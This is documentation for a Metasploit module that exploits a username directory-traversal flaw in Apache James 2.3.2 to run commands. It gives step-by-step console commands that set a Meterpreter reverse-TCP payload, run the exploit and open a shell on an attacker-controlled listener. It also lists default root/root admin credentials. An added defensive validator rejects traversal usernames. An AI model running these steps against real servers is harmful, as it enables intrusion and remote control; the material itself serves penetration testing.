metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md
2020-01-18 19:06:59 -08:00


Vulnerable Application

This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. Instructions for installing the vulnerable application for testing can be found here:
https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
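The missing input validation described above, shown as an added example from the defender's side (this is not code from the module or from Apache James): a username used directly as a path component, next to a hardened check that rejects traversal before any file is touched. The function names, the `BASE` store location and the allowed character set are assumptions made for this illustration.

```python
import os
import re

# Assumed policy for this example (not taken from Apache James):
# short names from a conservative character set.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def naive_user_path(base, username):
    """Pattern behind the bug: the username becomes a path component as-is."""
    return os.path.normpath(os.path.join(base, username))


def safe_user_path(base, username):
    """Return the storage path for username, or raise ValueError."""
    if not SAFE_NAME.fullmatch(username) or ".." in username:
        raise ValueError(f"rejected username: {username!r}")
    base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base, username))
    # Defence in depth: the resolved path must stay inside the user store.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes user store: {username!r}")
    return candidate


def audit(base, usernames):
    """Map each candidate name to True (accepted) or False (rejected)."""
    results = {}
    for name in usernames:
        try:
            safe_user_path(base, name)
            results[name] = True
        except ValueError:
            results[name] = False
    return results


# Constructed sample input; the store location is a placeholder path.
BASE = "/opt/example-mail/var/users"
SAMPLES = ["alice", "bob.smith", "../../tmp/x", "a/b", "..", "/etc/x", "eve\x00"]

if __name__ == "__main__":
    for name, ok in audit(BASE, SAMPLES).items():
        print(f"{name!r:16} accepted={ok} naive={naive_user_path(BASE, name)}")
```

The same `audit` function can be run over an exported list of existing account names to flag entries that should never have been accepted.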

Verification Steps

  1. Load the module:
  msf5 > use exploit/linux/smtp/apache_james_exec
  2. Set remote and local options:
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
  target => 1
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
  rhosts => 192.168.224.164
  msf5 exploit(linux/smtp/apache_james_exec) > set rport 25
  rport => 25

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444
  3. Set payload:
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  4. Check version and run exploit:
  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
  5. Set up and run listener (Can be done before running exploit):
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler  
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp  
  payload => linux/x64/meterpreter/reverse_tcp  
  msf5 exploit(multi/handler) > set lport 4444  
  lport => 4444  
  msf5 exploit(multi/handler) > set lhost 192.168.224.167  
  lhost => 192.168.224.167    

  msf5 exploit(multi/handler) > run  

  [*] Started reverse TCP handler on 192.168.224.167:4444  
  [*] Sending stage (3021284 bytes) to 192.168.224.164  
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800  

  meterpreter >  

Options

USERNAME: The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
PASSWORD: The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
ADMINPORT: The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
RHOSTS: The IP address of the vulnerable server.
RPORT: The port number of the SMTP service.

Targets

  Id  Name 
  --  ----
  0   Linux x86  
  1   Linux x64  

References

  1. https://www.exploit-db.com/exploits/35513
  2. https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf